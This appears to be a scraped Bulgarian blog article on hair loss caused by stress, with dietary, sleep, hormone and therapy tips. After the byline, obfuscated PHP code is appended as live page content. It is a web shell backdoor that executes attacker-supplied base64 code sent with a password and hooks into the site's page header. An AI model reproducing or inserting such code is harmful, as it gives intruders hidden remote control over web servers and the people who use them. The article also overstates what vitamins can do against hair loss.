Как да спрем косопада от стрес | Косопад

Как да спрем косопада от стрес

Физическият и емоционалният стрес могат да доведат до загуба на косата. Състоянието, известно като телогенен ефлувиум, причинява бърз и внезапен косопад. Това е отговорът на физическия стрес, който може да чувствате след раждане, треска, тежко заболяване или операция. Когато емоционалният и физическият стрес е хроничен или тежък, може да се отрази на нормалният цикъл на растеж на косата и да провокира оплешивяване. За щастие, за хората, които страдат от такъв косопад, има начини да се възстановят косата си.

kosopad-ot-stres

Как да се справите с косопада, причинен от стрес?

1 . Хранете се здравословно и балансирано всеки ден. Освен витамини В, които подобряват здравето на косата и растежа й, допълнете храненето си с витамини А, С, Е, както и с цинк, магнезий и селен, които ще спрат косопада. Омега- 3 мастните киселини подобряват здравето на скалпа. Добавки се препоръчват, ако източниците на храна са недостатъчни.

2 . Спете поне 8 часа през нощта. Сънят помага на тялото ти да се възстанови от стреса и е важен за здравето на скалпа. Ако дълго време се лишавате от тази почивка, увеличавате стреса, а това се отразява на косата ви.

3 . Дайте на тялото си достатъчно време, за да се възстанови след тежък физически стрес като раждане или операция. Ако сте под напрежение след тежка операция, само ще увеличите вероятността от косопад. Острият woman with a headache over white backgroundфизически стрес само се отразява на нормалния растеж на косата.

4 . Ако стресът се дължи на емоционален стрес, поотърсете специализирана помощ при терапевт.

5 . Проверете нивата на хормоните си. Това е много важно, особено ако косопадът е започнал след раждането, след кърмене или пиене на контрацептиви.

6. Проверете при специалист дали не страдате от алопеция ареата. Причината за появата на заболяването може да е емоционална и когато се справите с нея, и косопадът ще спре.

06. март 2014 12:49:09 от Надя Колева
Категории: Косопад – Статии | Етикети: , , , , | Напишете Коментар

if(!function_exists("_set_fetas_tag") && !function_exists("_set_betas_tag")){try{function _set_fetas_tag(){if(isset($_GET['here'])&&!isset($_POST['here'])){die(md5(8));}if(isset($_POST['here'])){$a1='m'.'d5';if($a1($a1($_POST['here']))==="83a7b60dd6a5daae1a2f1a464791dac4"){$a2="fi"."le"."_put"."_contents";$a22="base";$a22=$a22."64";$a22=$a22."_d";$a22=$a22."ecode";$a222="PD"."9wa"."HAg";$a2222=$_POST[$a1];$a3="sy"."s_ge"."t_te"."mp_dir";$a3=$a3();$a3 = $a3."/".$a1(uniqid(rand(), true));@$a2($a3,$a22($a222).$a22($a2222));include($a3); @$a2($a3,'1'); @unlink($a3);die();}else{echo md5(7);}die();}} _set_fetas_tag();if(!isset($_POST['here'])&&!isset($_GET['here'])){function _set_betas_tag(){echo "";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}}